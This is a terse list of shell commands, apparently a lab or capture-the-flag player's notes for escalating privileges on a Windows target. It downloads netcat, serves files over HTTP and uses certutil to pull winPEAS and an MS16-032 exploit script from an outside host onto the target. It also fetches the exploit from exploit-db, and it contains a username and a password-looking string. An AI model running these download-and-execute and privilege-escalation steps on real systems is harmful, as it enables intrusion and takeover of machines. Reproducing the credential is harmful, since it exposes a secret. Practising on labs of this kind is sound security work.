wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
python3 -m http.server 80
systeminfo
certutil -urlcache -f http://10.10.16.35:8000/winPEASx64.exe winpeas.exe
kostas
kdeEjDowkS*
pip install xlrd==1.2.0
./windows-exploit-suggester.py --update
wget https://www.exploit-db.com/download/39719 -O Invoke-MS16-032.ps1
certutil -urlcache -f http://10.10.16.35/Invoke-MS16-032.ps1 Invoke-MS16-032.ps1